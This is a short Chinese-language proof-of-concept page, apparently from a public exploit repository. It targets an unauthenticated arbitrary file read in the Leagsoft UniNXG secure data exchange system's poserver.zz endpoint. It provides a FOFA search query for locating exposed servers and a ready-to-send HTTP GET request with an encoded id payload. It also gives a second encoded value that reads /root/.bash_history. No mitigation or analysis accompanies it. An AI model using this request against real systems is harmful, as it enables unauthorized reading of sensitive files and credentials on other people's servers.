wy876_POC/联软/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
2024-08-21 15:08:43 +08:00

22 lines
914 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞
联软安渡UniNXG安全数据交换系统/UniExServices/poserver.zz存在任意文件读取漏洞未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件。
## fofa
```
body="深圳市联软科技股份有限公司"
```
## poc
```
GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
```
读取/root/.bash_history 历史命令
KmcgY3MtJm0lcmUsFl85ZhVmL3E4bSZ3amQvaitsF2srO2ckKW0icitsOHI/bis7OGM8cg==